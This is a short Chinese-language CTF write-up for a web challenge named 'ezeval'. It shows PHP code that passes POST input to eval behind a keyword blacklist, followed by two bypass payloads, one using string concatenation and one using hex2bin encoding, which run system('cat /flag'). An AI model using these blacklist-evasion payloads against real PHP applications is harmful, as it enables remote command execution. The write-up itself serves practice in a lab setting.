[WEB_ezeval]
2024-06-06 19:39:50
[WEB_ezeval]
题目:
打开环境,得到:
<?php
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
$cmd=htmlspecialchars($cmd);
$black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','exec','cookie','$','include','var','print','scan','decode','system','func','ini_','passthru','pcntl','open','link','log','current','local','source','require','contents');
$cmd = str_ireplace($black_list,"BMZCTF",$cmd);
eval($cmd);?>
接下来进行代码审计:
这时很简单的一个黑名单,有很多种办法都可以绕过,像什么字符串拼接,或者编码等绕过
0x01:
字符串拼接:
在php中,字符串使用点号来连接,故可以使用点号来进行绕过
构造payload:
cmd=(s.y.s.t.e.m)('cat /flag');
获得输出:
0x02:
使用编码绕过
在php里将16进制转换成字符串的函数是hex2bin,故可以用这种方式来进行绕过
payload:
cmd=hex2bin('73797374656D')('cat /flag');
即可得到flag:
这道题比较简单,就不做过多解释了
[WEB_ezeval]相关推荐
最新文章
- GitHub标星2000+,如何用30天啃完TensorFlow2.0?
- sd-wan公司组网解决方案效果如何?
- Vue3导入Vue-router报错:Uncaught SyntaxError: The requested module does not provide
- gzip,bzip2压缩工具及tar打包工具
- Angular Reactive Form 的一个具体使用例子
- 什么是转向灯?使用转向灯有何技巧?
- mysql applier_MySQL推出Applier,可实时复制数据到Hadoop-阿里云开发者社区
- FJ集团企业级邮件服务器——Exchange服务器安装与配置(边缘传输服务器)
- NetCore 2.0 + Swagger 的WebAPI 模板例子
- .NET开发相关技术
- 快狗打车上市:市值超130亿港元 姚劲波与陈小华收获IPO
- 红警2(红色警戒)之尤里的复仇 局域网对战联机方法
- 如何使用Easy-POI导入复杂表头的Excel报表(含源码级分析)
- Intel服务器CPU背面信息,涨知识:英特尔服务器CPU编号是啥意思?
- 阿里巴巴年终JAVA岗发布+最新面试手册(P5-P7)
- 苹果CMS插件-苹果CMS必备插件
- netmq VS redis 订阅发布性能研究
- 用计算机语言写结婚祝福语,抖音很火的一到10结婚祝福语
- 懒人之家-QQ客服右侧
- js怎么获取设备的地理位置
热门文章
- 复旦计算机考研英语,我收集的近几年复旦计算机复试笔试题
- 爱尔威火星车 AirWheel 电动独轮车
- Think in automotive Ethernet Topology
- codechef November Challenge 2017解题报告
- python判断两个列表是否相同_如何检查两个元组列表是否相同
- wolframalpha最新版_Wolfram Alpha安装包-数学工具wolfram alpha最新版1.4.4.2018021301下载_飞翔下载...
- 即将取代Maven和Gradle的新一代更强更快的构建工具(至尊典藏版)
- Python实现ALO蚁狮优化算法优化支持向量机回归模型(SVR算法)项目实战
- 织梦DedeCMS在自定义表单里加入验证码的方法
- 超经典爆笑的人生格言